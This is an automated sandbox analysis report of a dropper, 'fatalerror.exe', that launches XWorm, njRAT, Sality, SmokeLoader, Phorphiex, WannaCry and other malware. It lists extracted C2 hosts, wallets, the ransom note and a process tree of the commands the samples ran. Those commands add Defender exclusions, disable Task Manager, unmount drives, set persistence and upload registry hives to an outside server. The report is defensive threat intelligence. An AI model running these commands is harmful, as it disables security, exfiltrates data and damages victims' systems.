modiloader | 1d2822a34aa548e8e890e33b66cf6722e0bdb82944dae1b53feaf902790c5254

Resubmissions

11-04-2024 15:50

240411-tacvysaa6y 10

11-04-2024 14:37

240411-ry8lesde42 10

09-04-2024 17:30

240409-v3hscaha8y 10

08-01-2024 17:24

240108-vy3xqaecgj 10

Analysis

max time kernel
3s
max time network
429s
platform
windows10-1703_x64
resource
win10-20231215-en
resource tags

arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system
submitted
08-01-2024 17:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fatalerror.exe
Size

19.9MB
MD5

62df3bbc2aaeddab1942f1ed0b2db429
SHA1

a31b35f778fa5bec3a09b215db38d891fa45510d
SHA256

1d2822a34aa548e8e890e33b66cf6722e0bdb82944dae1b53feaf902790c5254
SHA512

6ab2b5f72db8b6e386c142e330807bd2eec9983c04ab034c4011c053a5be0294514f06693c66a9f8b6bcc7b60d1646810f7c2cda4379b6cdbda2f9d5d047bfdd
SSDEEP

393216:jDLmcuBUDiQv3FlGzbhweRo3W6aJZCN7TW/0k6CN1VWtES:jflGw3F6dwijJZCN2sA1Vc

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

TcK6iKFmjhETcMYi

Attributes

install_file
USB.exe
pastebin_url
https://pastebin.com/raw/RqgnZ1zk

aes.plain

Extracted

Family

xworm

tr1.localto.net:39186

Attributes

Install_directory
%ProgramData%
install_file
Microsoft Storge.exe

Extracted

Family

xtremerat

antonioxx.no-ip.org

Extracted

Family

sality

http://89.119.67.154/testo5/

http://kukutrustnet777.info/home.gif

http://kukutrustnet888.info/home.gif

http://kukutrustnet987.info/home.gif

http://www.klkjwre9fqwieluoi.info/

http://kukutrustnet777888.info/

Extracted

Family

njrat

Version

im523

Botnet

5.tcp.eu.ngrok.io:13017

Mutex

8b094ade9743639b941a0474f6aa7525

Attributes

reg_key
8b094ade9743639b941a0474f6aa7525
splitter
|'|'|

Extracted

Family

smokeloader

Version

2020

http://host-file-host6.com/

http://host-host-file8.com/

rc4.i32

Extracted

Family

phorphiex

http://185.215.113.66/

Wallets

0xAa3ea4838e8E3F6a1922c6B67E3cD6efD1ff175b

THRUoPK7oYqF7YyKZJvPYwTH35JsPZVPto

1Hw9tx4KyTq4oRoLVhPb4hjDJcLhEa4Tn6

qr89hag2967ef604ud3lw4pq8hmn69n46czwdnx3ut

XtxFdsKkRN3oVDXtN2ipcHeNi87basT2sL

LXMNcn9D8FQKzGNLjdSyR9dEM8Rsh9NzyX

rwn7tb5KQjXEjH42GgdHWHec5PPhVgqhSH

ARML6g7zynrwUHJbFJCCzMPiysUFXYBGgQ

48jYpFT6bT8MTeph7VsyzCQeDsGHqdQNc2kUkRFJPzfRHHjarBvBtudPUtParMkDzZbYBrd3yntWBQcsnVBNeeMbN9EXifg

3PL7YCa4akNYzuScqQwiSbtTP9q9E9PLreC

3FerB8kUraAVGCVCNkgv57zTBjUGjAUkU3

D9AJWrbYsidS9rAU146ifLRu1fzX9oQYSH

t1gvVWHnjbGTsoWXEyoTFojc2GqEzBgvbEn

bnb1cgttf7t5hu7ud3c436ufhcmy59qnkd09adqczd

bc1q0fusmmgycnhsd5cadsuz2hk8d4maausjfjypqg

bitcoincash:qr89hag2967ef604ud3lw4pq8hmn69n46czwdnx3ut

GAUCC7ZBSU2KJMHXOZD6AP5LOBGKNDPCDNRYP2CO2ACR63YCSUBNT5QE

Extracted

Path

C:\Users\Admin\Desktop\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn

Signatures

Detect XtremeRAT payload 7 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4088-316-0x0000000010000000-0x0000000010060000-memory.dmp	family_xtremerat
behavioral2/memory/3084-331-0x0000000010000000-0x0000000010060000-memory.dmp	family_xtremerat
behavioral2/memory/4088-347-0x0000000010000000-0x0000000010060000-memory.dmp	family_xtremerat
behavioral2/memory/3084-337-0x0000000010000000-0x0000000010060000-memory.dmp	family_xtremerat
behavioral2/memory/3092-361-0x0000000010000000-0x0000000010060000-memory.dmp	family_xtremerat
behavioral2/memory/3092-360-0x0000000010000000-0x0000000010060000-memory.dmp	family_xtremerat
behavioral2/memory/3092-340-0x0000000010000000-0x0000000010060000-memory.dmp	family_xtremerat

Detect Xworm Payload 5 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\Synapse X.exe	family_xworm
behavioral2/memory/2152-58-0x0000000000480000-0x0000000000490000-memory.dmp	family_xworm
behavioral2/memory/4128-171-0x0000000000280000-0x00000000002B4000-memory.dmp	family_xworm
C:\Users\Admin\Desktop\XClient.exe	family_xworm
C:\Users\Admin\Desktop\XClient.exe	family_xworm

Detect ZGRat V1 1 IoCs

Processes:

resource	yara_rule
C:\Program Files (x86)\Microsoft.NET\RedistList\Microsoft Storge.exe	family_zgrat_v1

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Phorphiex
Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex
Sality
Sality is backdoor written in C++, first discovered in 2003.
backdoor sality
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
XtremeRAT
The XtremeRAT was developed by xtremecoder and has been available since at least 2010, and written in Delphi.
persistence spyware rat xtremerat
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

ModiLoader Second Stage 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\ayhost.exe	modiloader_stage2
C:\Users\Admin\ayhost.exe	modiloader_stage2
behavioral2/memory/196-743-0x0000000000400000-0x0000000000417000-memory.dmp	modiloader_stage2

Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Processes:

netsh.exe

pid process

3032 netsh.exe
Executes dropped EXE 1 IoCs

Processes:

Synapse X.exe

pid process

2152 Synapse X.exe
Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

5576 icacls.exe

pid	process
3032	netsh.exe

pid	process
2152	Synapse X.exe

pid	process
5576	icacls.exe

UPX packed file 25 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/4088-304-0x0000000010000000-0x0000000010060000-memory.dmp	upx
behavioral2/memory/4088-309-0x0000000010000000-0x0000000010060000-memory.dmp	upx
behavioral2/memory/4088-310-0x0000000010000000-0x0000000010060000-memory.dmp	upx
behavioral2/memory/4088-314-0x0000000010000000-0x0000000010060000-memory.dmp	upx
behavioral2/memory/4088-316-0x0000000010000000-0x0000000010060000-memory.dmp	upx
behavioral2/memory/4088-322-0x0000000002250000-0x00000000032DE000-memory.dmp	upx
behavioral2/memory/4088-325-0x0000000002250000-0x00000000032DE000-memory.dmp	upx
behavioral2/memory/3084-331-0x0000000010000000-0x0000000010060000-memory.dmp	upx
behavioral2/memory/4088-338-0x0000000002250000-0x00000000032DE000-memory.dmp	upx
behavioral2/memory/4088-347-0x0000000010000000-0x0000000010060000-memory.dmp	upx
behavioral2/memory/3084-337-0x0000000010000000-0x0000000010060000-memory.dmp	upx
behavioral2/memory/3092-361-0x0000000010000000-0x0000000010060000-memory.dmp	upx
behavioral2/memory/3092-360-0x0000000010000000-0x0000000010060000-memory.dmp	upx
behavioral2/memory/3092-340-0x0000000010000000-0x0000000010060000-memory.dmp	upx
behavioral2/memory/4088-332-0x0000000002250000-0x00000000032DE000-memory.dmp	upx
behavioral2/memory/4088-319-0x0000000002250000-0x00000000032DE000-memory.dmp	upx
behavioral2/memory/3892-747-0x0000000000400000-0x000000000040E000-memory.dmp	upx
behavioral2/memory/3892-745-0x0000000000400000-0x000000000040E000-memory.dmp	upx
behavioral2/memory/3892-740-0x0000000000400000-0x000000000040E000-memory.dmp	upx
behavioral2/memory/3892-734-0x0000000000400000-0x000000000040E000-memory.dmp	upx
behavioral2/memory/5076-963-0x0000000005000000-0x000000000608E000-memory.dmp	upx
behavioral2/memory/5076-965-0x0000000005000000-0x000000000608E000-memory.dmp	upx
behavioral2/memory/5076-974-0x0000000005000000-0x000000000608E000-memory.dmp	upx
behavioral2/memory/5076-971-0x0000000005000000-0x000000000608E000-memory.dmp	upx
behavioral2/memory/3892-733-0x0000000000400000-0x000000000040E000-memory.dmp	upx

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

fatalerror.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2595843030-3811137303-3031389247-1000\Software\Microsoft\Windows\CurrentVersion\Run\Synapse X = "C:\\Users\\Admin\\Desktop\\Synapse X.exe"	fatalerror.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

4 ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	ioc
4	ip-api.com

Program crash 4 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
196	3084	WerFault.exe	svchost.exe
4368	3084	WerFault.exe	svchost.exe
3720	3892	WerFault.exe	ayhost.exe
4740	4412	WerFault.exe	2door.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

3116 schtasks.exe
5472 schtasks.exe
5280 schtasks.exe
Enumerates processes with tasklist 1 TTPs 3 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exe

pid process

3808 tasklist.exe
6024 tasklist.exe
504 tasklist.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

2588 vssadmin.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

6344 taskkill.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

6436 notepad.exe
Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

3732 PING.EXE
7484 PING.EXE
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

3876 powershell.exe
3876 powershell.exe
3876 powershell.exe

pid	process
3116	schtasks.exe
5472	schtasks.exe
5280	schtasks.exe

pid	process
3808	tasklist.exe
6024	tasklist.exe
504	tasklist.exe

pid	process
2588	vssadmin.exe

pid	process
6344	taskkill.exe

pid	process
6436	notepad.exe

pid	process
3732	PING.EXE
7484	PING.EXE

pid	process
3876	powershell.exe
3876	powershell.exe
3876	powershell.exe

Suspicious use of AdjustPrivilegeToken 22 IoCs

Processes:

powershell.exe

description	pid	process
Token: SeDebugPrivilege	3876	powershell.exe
Token: SeIncreaseQuotaPrivilege	3876	powershell.exe
Token: SeSecurityPrivilege	3876	powershell.exe
Token: SeTakeOwnershipPrivilege	3876	powershell.exe
Token: SeLoadDriverPrivilege	3876	powershell.exe
Token: SeSystemProfilePrivilege	3876	powershell.exe
Token: SeSystemtimePrivilege	3876	powershell.exe
Token: SeProfSingleProcessPrivilege	3876	powershell.exe
Token: SeIncBasePriorityPrivilege	3876	powershell.exe
Token: SeCreatePagefilePrivilege	3876	powershell.exe
Token: SeBackupPrivilege	3876	powershell.exe
Token: SeRestorePrivilege	3876	powershell.exe
Token: SeShutdownPrivilege	3876	powershell.exe
Token: SeDebugPrivilege	3876	powershell.exe
Token: SeSystemEnvironmentPrivilege	3876	powershell.exe
Token: SeRemoteShutdownPrivilege	3876	powershell.exe
Token: SeUndockPrivilege	3876	powershell.exe
Token: SeManageVolumePrivilege	3876	powershell.exe
Token: 33	3876	powershell.exe
Token: 34	3876	powershell.exe
Token: 35	3876	powershell.exe
Token: 36	3876	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

fatalerror.exe

description	pid	process	target process
PID 2968 wrote to memory of 3876	2968	fatalerror.exe	powershell.exe
PID 2968 wrote to memory of 3876	2968	fatalerror.exe	powershell.exe
PID 2968 wrote to memory of 2152	2968	fatalerror.exe	Synapse X.exe
PID 2968 wrote to memory of 2152	2968	fatalerror.exe	Synapse X.exe

Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exe

pid process

5568 attrib.exe
5736 attrib.exe

pid	process
5568	attrib.exe
5736	attrib.exe

C:\Users\Admin\AppData\Local\Temp\fatalerror.exe
"C:\Users\Admin\AppData\Local\Temp\fatalerror.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2968
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Synapse X.exe'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3876
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Trihydridoarsenic.exe'
  2⤵
  PID:3344
- C:\Users\Admin\Desktop\Synapse X.exe
  "C:\Users\Admin\Desktop\Synapse X.exe"
  2⤵
  - Executes dropped EXE
  PID:2152
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Synapse X.exe'
    3⤵
    PID:5064
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Synapse X.exe'
    3⤵
    PID:4140
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\XClient.exe'
  2⤵
  PID:2424
- C:\Users\Admin\Desktop\Trihydridoarsenic.exe
  "C:\Users\Admin\Desktop\Trihydridoarsenic.exe"
  2⤵
  PID:5076
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD hkcu\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableTaskMgr /t reg_dword /d 1 /f
    3⤵
    PID:4356
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c start mspaint
    3⤵
    PID:5576
  - - C:\Windows\SysWOW64\mspaint.exe
      mspaint
      4⤵
      PID:4492
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c start taskmgr
    3⤵
    PID:8100
  - - C:\Windows\SysWOW64\Taskmgr.exe
      taskmgr
      4⤵
      PID:7416
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mountvol a: /d
    3⤵
    PID:6312
  - - C:\Windows\SysWOW64\mountvol.exe
      mountvol a: /d
      4⤵
      PID:6356
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mountvol b: /d
    3⤵
    PID:2112
  - - C:\Windows\SysWOW64\mountvol.exe
      mountvol b: /d
      4⤵
      PID:3640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mountvol c: /d
    3⤵
    PID:4112
  - - C:\Windows\SysWOW64\mountvol.exe
      mountvol c: /d
      4⤵
      PID:1764
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\0x000a0000000133a8-19.exe'
  2⤵
  PID:3500
- C:\Users\Admin\Desktop\XClient.exe
  "C:\Users\Admin\Desktop\XClient.exe"
  2⤵
  PID:4128
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Storge" /tr "C:\ProgramData\Microsoft Storge.exe"
    3⤵
    - Creates scheduled task(s)
    PID:3116
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\01b33cd3304bbf320de06b217770cc59.exe'
  2⤵
  PID:3704
- C:\Users\Admin\Desktop\0x000a0000000133a8-19.exe
  "C:\Users\Admin\Desktop\0x000a0000000133a8-19.exe"
  2⤵
  PID:4488
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\01c06da01d03aba73f575da905366dad.exe'
  2⤵
  PID:392
- C:\Users\Admin\Desktop\01b33cd3304bbf320de06b217770cc59.exe
  "C:\Users\Admin\Desktop\01b33cd3304bbf320de06b217770cc59.exe"
  2⤵
  PID:1368
- - C:\Users\Admin\Desktop\01b33cd3304bbf320de06b217770cc59.exe
    "C:\Users\Admin\Desktop\01b33cd3304bbf320de06b217770cc59.exe"
    3⤵
    PID:4088
  - - C:\Windows\SysWOW64\svchost.exe
      svchost.exe
      4⤵
      PID:3084
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3084 -s 528
        5⤵
        Program crash
        
        PID:196
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3084 -s 548
        5⤵
        Program crash
        
        PID:4368
  - - C:\Windows\SysWOW64\LaunchWinApp.exe
      C:\Windows\system32\LaunchWinApp.exe
      4⤵
      PID:3092
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\2door.exe'
  2⤵
  PID:4024
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\2MASS J07225830-2546030.exe'
  2⤵
  PID:3036
- C:\Users\Admin\Desktop\2door.exe
  "C:\Users\Admin\Desktop\2door.exe"
  2⤵
  PID:3320
- C:\Users\Admin\Desktop\01c06da01d03aba73f575da905366dad.exe
  "C:\Users\Admin\Desktop\01c06da01d03aba73f575da905366dad.exe"
  2⤵
  PID:3760
- - C:\Users\Admin\ayhost.exe
    C:\Users\Admin\ayhost.exe
    3⤵
    PID:196
  - - C:\Users\Admin\ayhost.exe
      ayhost.exe
      4⤵
      PID:3892
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3892 -s 232
        5⤵
        Program crash
        
        PID:3720
- - C:\Users\Admin\bahost.exe
    C:\Users\Admin\bahost.exe
    3⤵
    PID:2120
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      PID:4532
- - C:\Users\Admin\djhost.exe
    C:\Users\Admin\djhost.exe
    3⤵
    PID:2472
  - - C:\Windows\SysWOW64\LaunchWinApp.exe
      "C:\Windows\system32\LaunchWinApp.exe" http://ginomp3.net
      4⤵
      PID:8184
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c tasklist&&del djhost.exe
      4⤵
      PID:5516
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:504
- - C:\Users\Admin\ekhost.exe
    C:\Users\Admin\ekhost.exe
    3⤵
    PID:6804
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c tasklist&&del 01c06da01d03aba73f575da905366dad.exe
    3⤵
    PID:1132
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:6024
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\3e71d2e715046c0f2e8241cdccbefe4b.exe'
  2⤵
  PID:828
- C:\Users\Admin\Desktop\2MASS J07225830-2546030.exe
  "C:\Users\Admin\Desktop\2MASS J07225830-2546030.exe"
  2⤵
  PID:2100
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im taskmgr.exe
    3⤵
    PID:5636
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im taskmgr.exe
      4⤵
      Kills process with taskkill
      PID:6344
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\8A184A4C0C3FBB38A42095F653EA1063A07F75D3DE1A1.exe'
  2⤵
  PID:1684
- C:\Users\Admin\Desktop\3e71d2e715046c0f2e8241cdccbefe4b.exe
  "C:\Users\Admin\Desktop\3e71d2e715046c0f2e8241cdccbefe4b.exe"
  2⤵
  PID:4284
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WjWgdwObUx" /XML "C:\Users\Admin\AppData\Local\Temp\tmpFA4F.tmp"
    3⤵
    - Creates scheduled task(s)
    PID:5280
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
    3⤵
    PID:596
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\87450041fd9f8909f7b340844bfa48ff03b2eb4a85064ce3a13b3ff5022ba94b.exe'
  2⤵
  PID:4140
- C:\Users\Admin\Desktop\8A184A4C0C3FBB38A42095F653EA1063A07F75D3DE1A1.exe
  "C:\Users\Admin\Desktop\8A184A4C0C3FBB38A42095F653EA1063A07F75D3DE1A1.exe"
  2⤵
  PID:2656
- - C:\Users\Admin\AppData\Roaming\SearchHost.exe
    "C:\Users\Admin\AppData\Roaming\SearchHost.exe"
    3⤵
    PID:1840
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\SearchHost.exe" "SearchHost.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      PID:3032
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\b5bf9b891fdd046d626082bad71ef887a9fcafca9cdfd6887d2e60ef6d4a0462.exe'
  2⤵
  PID:880
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\cdm.exe'
  2⤵
  PID:4736
- C:\Users\Admin\Desktop\b5bf9b891fdd046d626082bad71ef887a9fcafca9cdfd6887d2e60ef6d4a0462.exe
  "C:\Users\Admin\Desktop\b5bf9b891fdd046d626082bad71ef887a9fcafca9cdfd6887d2e60ef6d4a0462.exe"
  2⤵
  PID:4104
- - C:\Windows\syspolrvcs.exe
    C:\Windows\syspolrvcs.exe
    3⤵
    PID:2192
  - - C:\Users\Admin\AppData\Local\Temp\2333413204.exe
      C:\Users\Admin\AppData\Local\Temp\2333413204.exe
      4⤵
      PID:5544
    - - C:\Windows\sylsplvc.exe
        
        C:\Windows\sylsplvc.exe
        5⤵
        
        PID:6204
      - C:\Users\Admin\AppData\Local\Temp\2532412787.exe
        
        C:\Users\Admin\AppData\Local\Temp\2532412787.exe
        6⤵
        
        PID:6472
- C:\Users\Admin\Desktop\87450041fd9f8909f7b340844bfa48ff03b2eb4a85064ce3a13b3ff5022ba94b.exe
  "C:\Users\Admin\Desktop\87450041fd9f8909f7b340844bfa48ff03b2eb4a85064ce3a13b3ff5022ba94b.exe"
  2⤵
  PID:3368
- C:\Users\Admin\Desktop\cdm.exe
  "C:\Users\Admin\Desktop\cdm.exe"
  2⤵
  PID:3180
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\check_Registry.exe'
  2⤵
  PID:3216
- C:\Users\Admin\Desktop\check_Registry.exe
  "C:\Users\Admin\Desktop\check_Registry.exe"
  2⤵
  PID:196
- - C:\Users\Admin\AppData\Local\Temp\kape.exe
    "C:\Users\Admin\AppData\Local\Temp\kape.exe" --tsource C: --tdest NGBMWCIY\Target --target RegistryHivesUser --scs 79.174.93.239 --scp 22 --scu smartfiles --scpw "testsSBfilestransfer!!!!!" --scd uploads --vhdx VHDXInfo
    3⤵
    PID:3256
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Choc.exe'
  2⤵
  PID:2848
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\ColorCs.exe'
  2⤵
  PID:3232
- C:\Users\Admin\Desktop\Choc.exe
  "C:\Users\Admin\Desktop\Choc.exe"
  2⤵
  PID:2148
- C:\Users\Admin\Desktop\ColorCs.exe
  "C:\Users\Admin\Desktop\ColorCs.exe"
  2⤵
  PID:1516
- - C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    3⤵
    PID:5348
- - C:\Users\Admin\AppData\Local\Temp\bootrec.exe
    "C:\Users\Admin\AppData\Local\Temp\bootrec.exe"
    3⤵
    PID:5468
- - C:\Windows\system32\mmc.exe
    "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
    3⤵
    PID:5332
- - C:\Windows\system32\mmc.exe
    "C:\Windows\system32\mmc.exe" "C:\Windows\System32\devmgmt.msc"
    3⤵
    PID:5608
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe"
    3⤵
    PID:5260
- - C:\Windows\System32\mmc.exe
    "C:\Windows\System32\mmc.exe"
    3⤵
    PID:6164
- - C:\Windows\System32\control.exe
    "C:\Windows\System32\control.exe"
    3⤵
    PID:5444
- - C:\Windows\system32\mmc.exe
    "C:\Windows\system32\mmc.exe" "C:\Windows\System32\diskmgmt.msc"
    3⤵
    PID:6740
- - C:\Windows\System32\notepad.exe
    "C:\Windows\System32\notepad.exe"
    3⤵
    PID:5612
- - C:\Windows\System32\mstsc.exe
    "C:\Windows\System32\mstsc.exe"
    3⤵
    PID:6560
- - C:\Windows\system32\mmc.exe
    "C:\Windows\system32\mmc.exe" "C:\Windows\System32\taskschd.msc"
    3⤵
    PID:5356
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe'
  2⤵
  PID:8
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\EGN RU1.exe'
  2⤵
  PID:5380
- C:\Users\Admin\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
